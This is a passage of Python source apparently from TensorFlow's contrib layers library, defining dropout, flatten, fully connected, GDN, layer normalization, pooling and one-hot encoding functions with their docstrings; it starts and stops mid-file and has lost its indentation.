# Add variables to collections.
_add_variable_to_collections(layer.kernel, variables_collections, 'weights')
if layer.bias:
_add_variable_to_collections(layer.bias, variables_collections, 'biases')
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def dropout(inputs,
keep_prob=0.5,
noise_shape=None,
is_training=True,
outputs_collections=None,
scope=None):
"""Returns a dropout op applied to the input.
With probability `keep_prob`, outputs the input element scaled up by
`1 / keep_prob`, otherwise outputs `0`. The scaling is so that the expected
sum is unchanged.
Args:
inputs: The tensor to pass to the nn.dropout op.
keep_prob: A scalar `Tensor` with the same type as x. The probability
that each element is kept.
noise_shape: A 1-D `Tensor` of type `int32`, representing the
shape for randomly generated keep/drop flags.
is_training: A bool `Tensor` indicating whether or not the model
is in training mode. If so, dropout is applied and values scaled.
Otherwise, inputs is returned.
outputs_collections: Collection to add the outputs.
scope: Optional scope for name_scope.
Returns:
A tensor representing the output of the operation.
"""
with variable_scope.variable_scope(
scope, 'Dropout', [inputs], custom_getter=_model_variable_getter) as sc:
inputs = ops.convert_to_tensor(inputs)
layer = core_layers.Dropout(rate=1 - keep_prob,
noise_shape=noise_shape,
name=sc.name,
_scope=sc)
outputs = layer.apply(inputs, training=is_training)
return utils.collect_named_outputs(
outputs_collections, sc.original_name_scope, outputs)
@add_arg_scope
def flatten(inputs,
outputs_collections=None,
scope=None):
"""Flattens the input while maintaining the batch_size.
Assumes that the first dimension represents the batch.
Args:
inputs: A tensor of size [batch_size, ...].
outputs_collections: Collection to add the outputs.
scope: Optional scope for name_scope.
Returns:
A flattened tensor with shape [batch_size, k].
Raises:
ValueError: If inputs rank is unknown or less than 2.
"""
with ops.name_scope(scope, 'Flatten', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
inputs_rank = inputs.get_shape().ndims
if (inputs_rank is None) or (inputs_rank < 2):
raise ValueError('Inputs must have a least 2 dimensions.')
inputs_shape = array_ops.shape(inputs)
batch_dim = array_ops.slice(inputs_shape, [0], [1])
spatial_dims = array_ops.slice(inputs_shape, [1], [inputs_rank - 1])
flat_spatial_dim = math_ops.reduce_prod(spatial_dims)
flat_spatial_dim = array_ops.expand_dims(flat_spatial_dim, 0)
flat_shape = array_ops.concat([batch_dim, flat_spatial_dim], 0)
outputs = array_ops.reshape(inputs, flat_shape)
# Attempt to propagate shape information, if it is defined.
input_shape = inputs.get_shape().as_list()
batch_dim, spatial_dims = input_shape[0], input_shape[1:]
if all(spatial_dims):
outputs.set_shape([batch_dim,
functools.reduce(lambda x, y: x * y, spatial_dims)])
else:
outputs.set_shape([batch_dim, None])
return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _sparse_inner_flatten(inputs, new_rank):
"""Helper function for `inner_flatten`."""
inputs_rank = inputs.dense_shape.get_shape().as_list()[0]
if inputs_rank < new_rank:
raise ValueError(
'Inputs has rank less than new_rank. {} must have rank at least'
' {}. Received rank {}, shape {}'.format(inputs, new_rank, inputs_rank,
inputs.get_shape()))
outer_dimensions = inputs.dense_shape[:new_rank - 1]
inner_dimensions = inputs.dense_shape[new_rank - 1:]
new_shape = array_ops.concat((outer_dimensions,
[math_ops.reduce_prod(inner_dimensions)]), 0)
flattened = sparse_ops.sparse_reshape(inputs, new_shape)
return flattened
def _dense_inner_flatten(inputs, new_rank):
"""Helper function for `inner_flatten`."""
rank_assertion = check_ops.assert_rank_at_least(
inputs, new_rank, message='inputs has rank less than new_rank')
with ops.control_dependencies([rank_assertion]):
outer_dimensions = array_ops.strided_slice(
array_ops.shape(inputs), [0], [new_rank - 1])
new_shape = array_ops.concat((outer_dimensions, [-1]), 0)
reshaped = array_ops.reshape(inputs, new_shape)
# if `new_rank` is an integer, try to calculate new shape.
if isinstance(new_rank, six.integer_types):
static_shape = inputs.get_shape()
if static_shape is not None and static_shape.dims is not None:
static_shape = static_shape.as_list()
static_outer_dims = static_shape[:new_rank - 1]
static_inner_dims = static_shape[new_rank - 1:]
flattened_dimension = 1
for inner_dim in static_inner_dims:
if inner_dim is None:
flattened_dimension = None
break
flattened_dimension *= inner_dim
reshaped.set_shape(static_outer_dims + [flattened_dimension])
return reshaped
@add_arg_scope
def _inner_flatten(inputs, new_rank, output_collections=None, scope=None):
"""Flattens inner dimensions of `inputs`, returns a Tensor with `new_rank`.
For example:
'''
x = tf.random_uniform(shape=[1, 2, 3, 4, 5, 6])
y = _inner_flatten(x, 4)
assert y.get_shape().as_list() == [1, 2, 3, (4 * 5 * 6)]
'''
This layer will fail at run time if `new_rank` is greater than the current
rank of `inputs`.
Args:
inputs: A `Tensor` or `SparseTensor`.
new_rank: The desired rank of the returned `Tensor` or `SparseTensor`.
output_collections: Collection to which the outputs will be added.
scope: Optional scope for `name_scope`.
Returns:
A `Tensor` or `SparseTensor` conataining the same values as `inputs`, but
with innermost dimensions flattened to obtain rank `new_rank`.
Raises:
TypeError: `inputs` is not a `Tensor` or `SparseTensor`.
"""
with ops.name_scope(scope, 'InnerFlatten', [inputs, new_rank]) as sc:
if isinstance(inputs, sparse_tensor.SparseTensor):
flattened = _sparse_inner_flatten(inputs, new_rank)
else:
inputs = ops.convert_to_tensor(inputs)
flattened = _dense_inner_flatten(inputs, new_rank)
return utils.collect_named_outputs(output_collections, sc, flattened)
def _model_variable_getter(getter, name, shape=None, dtype=None,
initializer=None, regularizer=None, trainable=True,
collections=None, caching_device=None,
partitioner=None, rename=None, use_resource=None,
**_):
"""Getter that uses model_variable for compatibility with core layers."""
short_name = name.split('/')[-1]
if rename and short_name in rename:
name_components = name.split('/')
name_components[-1] = rename[short_name]
name = '/'.join(name_components)
return variables.model_variable(
name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, collections=collections, trainable=trainable,
caching_device=caching_device, partitioner=partitioner,
custom_getter=getter, use_resource=use_resource)
def _build_variable_getter(rename=None):
"""Build a model variable getter that respects scope getter and renames."""
# VariableScope will nest the getters
def layer_variable_getter(getter, *args, **kwargs):
kwargs['rename'] = rename
return _model_variable_getter(getter, *args, **kwargs)
return layer_variable_getter
def _add_variable_to_collections(variable, collections_set, collections_name):
"""Adds variable (or all its parts) to all collections with that name."""
collections = utils.get_variable_collections(
collections_set, collections_name) or []
variables_list = [variable]
if isinstance(variable, tf_variables.PartitionedVariable):
variables_list = [v for v in variable]
for collection in collections:
for var in variables_list:
if var not in ops.get_collection(collection):
ops.add_to_collection(collection, var)
@add_arg_scope
def fully_connected(inputs,
num_outputs,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a fully connected layer.
`fully_connected` creates a variable called `weights`, representing a fully
connected weight matrix, which is multiplied by the `inputs` to produce a
`Tensor` of hidden units. If a `normalizer_fn` is provided (such as
`batch_norm`), it is then applied. Otherwise, if `normalizer_fn` is
None and a `biases_initializer` is provided then a `biases` variable would be
created and added the hidden units. Finally, if `activation_fn` is not `None`,
it is applied to the hidden units as well.
Note: that if `inputs` have a rank greater than 2, then `inputs` is flattened
prior to the initial matrix multiply by `weights`.
Args:
inputs: A tensor of at least rank 2 and static value for the last dimension;
i.e. `[batch_size, depth]`, `[None, None, None, channels]`.
num_outputs: Integer or long, the number of output units in the layer.
activation_fn: Activation function. The default value is a ReLU function.
Explicitly set it to None to skip it and maintain a linear activation.
normalizer_fn: Normalization function to use instead of `biases`. If
`normalizer_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
default set to None for no normalizer function
normalizer_params: Normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: Whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional list of collections for all the variables or
a dictionary containing a different list of collections per variable.
outputs_collections: Collection to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_scope.
Returns:
The tensor variable representing the result of the series of operations.
Raises:
ValueError: If x has rank less than 2 or if its last dimension is not set.
"""
if not isinstance(num_outputs, six.integer_types):
raise ValueError(
'num_outputs should be int or long, got %s.' % (num_outputs,))
layer_variable_getter = _build_variable_getter({'bias': 'biases',
'kernel': 'weights'})
with variable_scope.variable_scope(
scope, 'fully_connected', [inputs],
reuse=reuse, custom_getter=layer_variable_getter) as sc:
inputs = ops.convert_to_tensor(inputs)
layer = core_layers.Dense(
units=num_outputs,
activation=None,
use_bias=not normalizer_fn and biases_initializer,
kernel_initializer=weights_initializer,
bias_initializer=biases_initializer,
kernel_regularizer=weights_regularizer,
bias_regularizer=biases_regularizer,
activity_regularizer=None,
trainable=trainable,
name=sc.name,
dtype=inputs.dtype.base_dtype,
_scope=sc,
_reuse=reuse)
outputs = layer.apply(inputs)
# Add variables to collections.
_add_variable_to_collections(layer.kernel, variables_collections, 'weights')
if layer.bias is not None:
_add_variable_to_collections(layer.bias, variables_collections, 'biases')
# Apply normalizer function / layer.
if normalizer_fn is not None:
if not normalizer_params:
normalizer_params = {}
outputs = normalizer_fn(outputs, **normalizer_params)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(
outputs_collections, sc.original_name_scope, outputs)
class GDN(base.Layer):
"""Generalized divisive normalization layer.
Based on the papers:
"Density Modeling of Images using a Generalized Normalization
Transformation"
Johannes Ballé, Valero Laparra, Eero P. Simoncelli
https://arxiv.org/abs/1511.06281
"End-to-end Optimized Image Compression"
Johannes Ballé, Valero Laparra, Eero P. Simoncelli
https://arxiv.org/abs/1611.01704
Implements an activation function that is essentially a multivariate
generalization of a particular sigmoid-type function:
```
y[i] = x[i] / sqrt(beta[i] + sum_j(gamma[j, i] * x[j]))
```
where `i` and `j` run over channels. This implementation never sums across
spatial dimensions. It is similar to local response normalization, but much
more flexible, as `beta` and `gamma` are trainable parameters.
Arguments:
inverse: If `False` (default), compute GDN response. If `True`, compute IGDN
response (one step of fixed point iteration to invert GDN; the division
is replaced by multiplication).
beta_min: Lower bound for beta, to prevent numerical error from causing
square root of zero or negative values.
gamma_init: The gamma matrix will be initialized as the identity matrix
multiplied with this value. If set to zero, the layer is effectively
initialized to the identity operation, since beta is initialized as one.
A good default setting is somewhere between 0 and 0.5.
reparam_offset: Offset added to the reparameterization of beta and gamma.
The reparameterization of beta and gamma as their square roots lets the
training slow down when their values are close to zero, which is desirable
as small values in the denominator can lead to a situation where gradient
noise on beta/gamma leads to extreme amounts of noise in the GDN
activations. However, without the offset, we would get zero gradients if
any elements of beta or gamma were exactly zero, and thus the training
could get stuck. To prevent this, we add this small constant. The default
value was empirically determined as a good starting point. Making it
bigger potentially leads to more gradient noise on the activations, making
it too small may lead to numerical precision issues.
data_format: Format of input tensor. Currently supports `'channels_first'`
and `'channels_last'`.
activity_regularizer: Regularizer function for the output.
trainable: Boolean, if `True`, also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: String, the name of the layer. Layers with the same name will
share weights, but to avoid mistakes we require `reuse=True` in such
cases.
Properties:
inverse: Boolean, whether GDN is computed (`True`) or IGDN (`False`).
data_format: Format of input tensor. Currently supports `'channels_first'`
and `'channels_last'`.
beta: The beta parameter as defined above (1D `Tensor`).
gamma: The gamma parameter as defined above (2D `Tensor`).
"""
def __init__(self,
inverse=False,
beta_min=1e-6,
gamma_init=.1,
reparam_offset=2 ** -18,
data_format='channels_last',
activity_regularizer=None,
trainable=True,
name=None,
**kwargs):
super(GDN, self).__init__(trainable=trainable, name=name, **kwargs)
self.inverse = inverse
self._beta_min = beta_min
self._gamma_init = gamma_init
self._reparam_offset = reparam_offset
self.data_format = data_format
self.activity_regularizer = activity_regularizer
self._channel_axis() # trigger ValueError early
self.input_spec = base.InputSpec(min_ndim=3, max_ndim=5)
def _channel_axis(self):
try:
return {'channels_first': 1, 'channels_last': -1}[self.data_format]
except KeyError:
raise ValueError('Unsupported `data_format` for GDN layer: {}.'.format(
self.data_format))
@staticmethod
def _lower_bound(inputs, bound, name=None):
"""Same as tf.maximum, but with helpful gradient for inputs < bound.
The gradient is overwritten so that it is passed through if the input is not
hitting the bound. If it is, only gradients that push `inputs` higher than
the bound are passed through. No gradients are passed through to the bound.
Args:
inputs: input tensor
bound: lower bound for the input tensor
name: name for this op
Returns:
tf.maximum(inputs, bound)
"""
with ops.name_scope(name, 'GDNLowerBound', [inputs, bound]) as scope:
inputs = ops.convert_to_tensor(inputs, name='inputs')
bound = ops.convert_to_tensor(bound, name='bound')
with ops.get_default_graph().gradient_override_map(
{'Maximum': 'GDNLowerBound'}):
return math_ops.maximum(inputs, bound, name=scope)
@staticmethod
def _lower_bound_grad(op, grad):
"""Gradient for `_lower_bound`.
Args:
op: the tensorflow op for which to calculate a gradient
grad: gradient with respect to the output of the op
Returns:
gradients with respect to the inputs of the op
"""
inputs = op.inputs[0]
bound = op.inputs[1]
pass_through_if = math_ops.logical_or(inputs >= bound, grad < 0)
return [math_ops.cast(pass_through_if, grad.dtype) * grad, None]
def build(self, input_shape):
channel_axis = self._channel_axis()
input_shape = tensor_shape.TensorShape(input_shape)
num_channels = input_shape[channel_axis].value
if num_channels is None:
raise ValueError('The channel dimension of the inputs to `GDN` '
'must be defined.')
self._input_rank = input_shape.ndims
self.input_spec = base.InputSpec(ndim=input_shape.ndims,
axes={channel_axis: num_channels})
pedestal = array_ops.constant(self._reparam_offset ** 2, dtype=self.dtype)
beta_bound = array_ops.constant(
(self._beta_min + self._reparam_offset ** 2) ** .5, dtype=self.dtype)
gamma_bound = array_ops.constant(self._reparam_offset, dtype=self.dtype)
def beta_initializer(shape, dtype=None, partition_info=None):
del partition_info # unused
return math_ops.sqrt(array_ops.ones(shape, dtype=dtype) + pedestal)
def gamma_initializer(shape, dtype=None, partition_info=None):
del partition_info # unused
assert len(shape) == 2
assert shape[0] == shape[1]
eye = linalg_ops.eye(shape[0], dtype=dtype)
return math_ops.sqrt(self._gamma_init * eye + pedestal)
beta = self.add_variable('reparam_beta',
shape=[num_channels],
initializer=beta_initializer,
dtype=self.dtype,
trainable=True)
beta = self._lower_bound(beta, beta_bound)
self.beta = math_ops.square(beta) - pedestal
gamma = self.add_variable('reparam_gamma',
shape=[num_channels, num_channels],
initializer=gamma_initializer,
dtype=self.dtype,
trainable=True)
gamma = self._lower_bound(gamma, gamma_bound)
self.gamma = math_ops.square(gamma) - pedestal
self.built = True
def call(self, inputs):
inputs = ops.convert_to_tensor(inputs, dtype=self.dtype)
ndim = self._input_rank
shape = self.gamma.get_shape().as_list()
gamma = array_ops.reshape(self.gamma, (ndim - 2) * [1] + shape)
# Compute normalization pool.
if self.data_format == 'channels_first':
norm_pool = nn.convolution(math_ops.square(inputs), gamma, 'VALID',
data_format='NC' + 'DHW'[-(ndim - 2):])
if ndim == 3:
norm_pool = array_ops.expand_dims(norm_pool, 2)
norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NCHW')
norm_pool = array_ops.squeeze(norm_pool, [2])
elif ndim == 5:
shape = array_ops.shape(norm_pool)
norm_pool = array_ops.reshape(norm_pool, shape[:3] + [-1])
norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NCHW')
norm_pool = array_ops.reshape(norm_pool, shape)
else: # ndim == 4
norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NCHW')
else: # channels_last
norm_pool = nn.convolution(math_ops.square(inputs), gamma, 'VALID')
norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NHWC')
norm_pool = math_ops.sqrt(norm_pool)
if self.inverse:
outputs = inputs * norm_pool
else:
outputs = inputs / norm_pool
outputs.set_shape(inputs.get_shape())
return outputs
def _compute_output_shape(self, input_shape):
channel_axis = self._channel_axis()
input_shape = tensor_shape.TensorShape(input_shape)
if not 3 <= input_shape.ndim <= 5:
raise ValueError('`input_shape` must be of rank 3 to 5, inclusive.')
if input_shape[channel_axis].value is None:
raise ValueError(
'The channel dimension of `input_shape` must be defined.')
return input_shape
ops.RegisterGradient('GDNLowerBound')(GDN._lower_bound_grad) # pylint:disable=protected-access
def gdn(inputs,
inverse=False,
beta_min=1e-6,
gamma_init=.1,
reparam_offset=2 ** -18,
data_format='channels_last',
activity_regularizer=None,
trainable=True,
name=None,
reuse=None):
"""Functional interface for GDN layer.
Based on the papers:
"Density Modeling of Images using a Generalized Normalization
Transformation"
Johannes Ballé, Valero Laparra, Eero P. Simoncelli
https://arxiv.org/abs/1511.06281
"End-to-end Optimized Image Compression"
Johannes Ballé, Valero Laparra, Eero P. Simoncelli
https://arxiv.org/abs/1611.01704
Implements an activation function that is essentially a multivariate
generalization of a particular sigmoid-type function:
```
y[i] = x[i] / sqrt(beta[i] + sum_j(gamma[j, i] * x[j]))
```
where `i` and `j` run over channels. This implementation never sums across
spatial dimensions. It is similar to local response normalization, but much
more flexible, as `beta` and `gamma` are trainable parameters.
Args:
inputs: Tensor input.
inverse: If `False` (default), compute GDN response. If `True`, compute IGDN
response (one step of fixed point iteration to invert GDN; the division
is replaced by multiplication).
beta_min: Lower bound for beta, to prevent numerical error from causing
square root of zero or negative values.
gamma_init: The gamma matrix will be initialized as the identity matrix
multiplied with this value. If set to zero, the layer is effectively
initialized to the identity operation, since beta is initialized as one.
A good default setting is somewhere between 0 and 0.5.
reparam_offset: Offset added to the reparameterization of beta and gamma.
The reparameterization of beta and gamma as their square roots lets the
training slow down when their values are close to zero, which is desirable
as small values in the denominator can lead to a situation where gradient
noise on beta/gamma leads to extreme amounts of noise in the GDN
activations. However, without the offset, we would get zero gradients if
any elements of beta or gamma were exactly zero, and thus the training
could get stuck. To prevent this, we add this small constant. The default
value was empirically determined as a good starting point. Making it
bigger potentially leads to more gradient noise on the activations, making
it too small may lead to numerical precision issues.
data_format: Format of input tensor. Currently supports `'channels_first'`
and `'channels_last'`.
activity_regularizer: Regularizer function for the output.
trainable: Boolean, if `True`, also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: String, the name of the layer. Layers with the same name will
share weights, but to avoid mistakes we require `reuse=True` in such
cases.
reuse: Boolean, whether to reuse the weights of a previous layer by the same
name.
Returns:
Output tensor.
"""
layer = GDN(inverse=inverse,
beta_min=beta_min,
gamma_init=gamma_init,
reparam_offset=reparam_offset,
data_format=data_format,
activity_regularizer=activity_regularizer,
trainable=trainable,
name=name,
dtype=inputs.dtype.base_dtype,
_scope=name,
_reuse=reuse)
return layer.apply(inputs)
@add_arg_scope
def layer_norm(inputs,
center=True,
scale=True,
activation_fn=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
begin_norm_axis=1,
begin_params_axis=-1,
scope=None):
"""Adds a Layer Normalization layer.
Based on the paper:
"Layer Normalization"
Jimmy Lei Ba, Jamie Ryan Kiros, Geoffrey E. Hinton
https://arxiv.org/abs/1607.06450.
Can be used as a normalizer function for conv2d and fully_connected.
Given a tensor `inputs` of rank `R`, moments are calculated and normalization
is performed over axes `begin_norm_axis ... R - 1`. Scaling and centering,
if requested, is performed over axes `begin_shift_axis .. R - 1`.
By default, `begin_norm_axis = 1` and `begin_params_axis = -1`,
meaning that normalization is performed over all but the first axis
(the `HWC` if `inputs` is `NHWC`), while the `beta` and `gamma` trainable
parameters are calculated for the rightmost axis (the `C` if `inputs` is
`NHWC`). Scaling and recentering is performed via broadcast of the
`beta` and `gamma` parameters with the normalized tensor.
The shapes of `beta` and `gamma` are `inputs.shape[begin_params_axis:]`,
and this part of the inputs' shape must be fully defined.
Args:
inputs: A tensor having rank `R`. The normalization is performed over
axes `begin_norm_axis ... R - 1` and centering and scaling parameters
are calculated over `begin_params_axis ... R - 1`.
center: If True, add offset of `beta` to normalized tensor. If False, `beta`
is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
activation_fn: Activation function, default set to None to skip it and
maintain a linear activation.
reuse: Whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional collections for the variables.
outputs_collections: Collections to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
begin_norm_axis: The first normalization dimension: normalization will be
performed along dimensions `begin_norm_axis : rank(inputs)`
begin_params_axis: The first parameter (beta, gamma) dimension: scale
and centering parameters will have dimensions
`begin_params_axis : rank(inputs)` and will be broadcast with the
normalized inputs accordingly.
scope: Optional scope for `variable_scope`.
Returns:
A `Tensor` representing the output of the operation, having the same
shape and dtype as `inputs`.
Raises:
ValueError: If the rank of `inputs` is not known at graph build time,
or if `inputs.shape[begin_params_axis:]` is not fully defined at
graph build time.
"""
with variable_scope.variable_scope(scope, 'LayerNorm', [inputs],
reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
inputs_shape = inputs.shape
inputs_rank = inputs_shape.ndims
if inputs_rank is None:
raise ValueError('Inputs %s has undefined rank.' % inputs.name)
dtype = inputs.dtype.base_dtype
if begin_norm_axis < 0:
begin_norm_axis = inputs_rank + begin_norm_axis
if begin_params_axis >= inputs_rank or begin_norm_axis >= inputs_rank:
raise ValueError(
'begin_params_axis (%d) and begin_norm_axis (%d) '
'must be < rank(inputs) (%d)'
% (begin_params_axis, begin_norm_axis, inputs_rank))
params_shape = inputs_shape[begin_params_axis:]
if not params_shape.is_fully_defined():
raise ValueError(
'Inputs %s: shape(inputs)[%s:] is not fully defined: %s' % (
inputs.name, begin_params_axis, inputs_shape))
# Allocate parameters for the beta and gamma of the normalization.
beta, gamma = None, None
if center:
beta_collections = utils.get_variable_collections(variables_collections,
'beta')
beta = variables.model_variable(
'beta',
shape=params_shape,
dtype=dtype,
initializer=init_ops.zeros_initializer(),
collections=beta_collections,
trainable=trainable)
if scale:
gamma_collections = utils.get_variable_collections(variables_collections,
'gamma')
gamma = variables.model_variable(
'gamma',
shape=params_shape,
dtype=dtype,
initializer=init_ops.ones_initializer(),
collections=gamma_collections,
trainable=trainable)
# Calculate the moments on the last axis (layer activations).
norm_axes = list(range(begin_norm_axis, inputs_rank))
mean, variance = nn.moments(inputs, norm_axes, keep_dims=True)
# Compute layer normalization using the batch_normalization function.
variance_epsilon = 1e-12
outputs = nn.batch_normalization(
inputs, mean, variance, offset=beta, scale=gamma,
variance_epsilon=variance_epsilon)
outputs.set_shape(inputs_shape)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope,
outputs)
@add_arg_scope
def max_pool2d(inputs,
kernel_size,
stride=2,
padding='VALID',
data_format=DATA_FORMAT_NHWC,
outputs_collections=None,
scope=None):
"""Adds a 2D Max Pooling op.
It is assumed that the pooling is done per image but not in batch or channels.
Args:
inputs: A 4-D tensor of shape `[batch_size, height, width, channels]` if
`data_format` is `NHWC`, and `[batch_size, channels, height, width]` if
`data_format` is `NCHW`.
kernel_size: A list of length 2: [kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: A list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: The padding method, either 'VALID' or 'SAME'.
data_format: A string. `NHWC` (default) and `NCHW` are supported.
outputs_collections: The collections to which the outputs are added.
scope: Optional scope for name_scope.
Returns:
A `Tensor` representing the results of the pooling operation.
Raises:
ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
ValueError: If 'kernel_size' is not a 2-D list
"""
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
with ops.name_scope(scope, 'MaxPool2D', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = pooling_layers.MaxPooling2D(pool_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
_scope=sc)
outputs = layer.apply(inputs)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def max_pool3d(inputs,
kernel_size,
stride=2,
padding='VALID',
data_format=DATA_FORMAT_NDHWC,
outputs_collections=None,
scope=None):
"""Adds a 3D Max Pooling op.
It is assumed that the pooling is done per image but not in batch or channels.
Args:
inputs: A 5-D tensor of shape `[batch_size, depth, height, width, channels]` if
`data_format` is `NDHWC`, and `[batch_size, channels, depth, height, width]` if
`data_format` is `NCDHW`.
kernel_size: A list of length 3: [kernel_depth, kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: A list of length 3: [stride_depth, stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: The padding method, either 'VALID' or 'SAME'.
data_format: A string. `NDHWC` (default) and `NCDHW` are supported.
outputs_collections: The collections to which the outputs are added.
scope: Optional scope for name_scope.
Returns:
A `Tensor` representing the results of the pooling operation.
Raises:
ValueError: If `data_format` is neither `NDHWC` nor `NCDHW`.
ValueError: If 'kernel_size' is not a 3-D list
"""
if data_format not in (DATA_FORMAT_NCDHW, DATA_FORMAT_NDHWC):
raise ValueError('data_format has to be either NCDHW or NDHWC.')
with ops.name_scope(scope, 'MaxPool3D', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = pooling_layers.MaxPooling3D(pool_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
_scope=sc)
outputs = layer.apply(inputs)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def pool(inputs,
kernel_size,
pooling_type,
padding='VALID',
data_format=None,
dilation_rate=1,
stride=1,
outputs_collections=None,
scope=None):
# pylint: disable=line-too-long
"""Adds a pooling op.
Args:
inputs: Tensor of rank N+2, of shape
`[batch_size] + input_spatial_shape + [num_channels]` if data_format does
not start with "NC" (default), or
`[batch_size, num_channels] + input_spatial_shape` if data_format starts
with "NC". Pooling happens over the spatial dimensions only.
kernel_size: Sequence of N ints >= 1. Can also be a single integer to
specify the same value for all spatial dimensions.
pooling_type: Specifies pooling operation, must be "AVG" or "MAX".
padding: The padding algorithm, must be "SAME" or "VALID".
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
For N=3, the valid values are "NDHWC" (default) and "NCDHW".
dilation_rate: Optional. Dilation rate. Sequence of N ints >= 1. Defaults
to [1]*N. Can also be a single integer to specify the same value for all
spatial dimensions. If any value of dilation_rate is > 1, then all values
of stride must be 1.
stride: Optional. Sequence of N ints >= 1. Defaults to [1]*N. Can also be
a single integer to specify the same value for all spatial dimensions. If
any value of stride is > 1, then all values of dilation_rate must be 1.
outputs_collections: The collections to which the outputs are added.
scope: Optional scope for name_scope.
Returns:
A `Tensor` representing the results of the pooling operation.
Raises:
ValueError: If arguments are invalid.
"""
# pylint: enable=line-too-long
with ops.name_scope(scope, '%s_pool' %
(pooling_type.lower()), [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
input_rank = inputs.get_shape().ndims
if input_rank is None:
raise ValueError('Rank of inputs must be known')
if input_rank < 3:
raise ValueError('Rank of inputs must be >= 3')
num_spatial_dims = input_rank - 2
output = nn.pool(
input=inputs,
window_shape=utils.n_positive_integers(num_spatial_dims, kernel_size),
pooling_type=pooling_type,
padding=padding,
data_format=data_format,
dilation_rate=utils.n_positive_integers(num_spatial_dims,
dilation_rate),
strides=utils.n_positive_integers(num_spatial_dims, stride),
name=sc)
return utils.collect_named_outputs(outputs_collections, sc, output)
@add_arg_scope
def one_hot_encoding(labels,
num_classes,
on_value=1.0,
off_value=0.0,
outputs_collections=None,
scope=None):
"""Transform numeric labels into onehot_labels using `tf.one_hot`.
Args:
labels: [batch_size] target labels.
num_classes: Total number of classes.
on_value: A scalar defining the on-value.
off_value: A scalar defining the off-value.
outputs_collections: Collection to add the outputs.
scope: Optional scope for name_scope.
Returns:
One-hot encoding of the labels.
"""
with ops.name_scope(scope, 'OneHotEncoding', [labels, num_classes]) as sc:
labels = ops.convert_to_tensor(labels)
if labels.dtype == dtypes.int32:
labels = standard_ops.to_int64(labels)
outputs = standard_ops.one_hot(labels,
num_classes,
on_value=on_value,
off_value=off_value)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _apply_activation(y, activation_fn, output_collections):
if activation_fn is not None:
y = activation_fn(y)
ops.add_to_collections(list(output_collections or []) +
[ops.GraphKeys.ACTIVATIONS], y)
return y
def repeat(inputs, repetitions, layer, *args, **kwargs):
"""Applies the same layer with the same arguments repeatedly.
```python
y = repeat(x, 3, conv2d, 64, [3, 3], scope='conv1')
# It is equivalent to:
x = conv2d(x, 64, [3, 3], scope='conv1/conv1_1')
x = conv2d(x, 64, [3, 3], scope='conv1/conv1_2')
y = conv2d(x, 64, [3, 3], scope='conv1/conv1_3')
```
If the `scope` argument is not given in `kwargs`, it is set to
`layer.__name__`, or `layer.func.__name__` (for `functools.partial`
objects). If neither `__name__` nor `func.__name__` is available, the
layers are called with `scope='stack'`.
Args:
inputs: A `Tensor` suitable for layer.
repetitions: Int, number of repetitions.
layer: A layer with arguments `(inputs, *args, **kwargs)`
*args: Extra args for the layer.
**kwargs: Extra kwargs for the layer.
Returns:
A tensor result of applying the layer, repetitions times.
Raises:
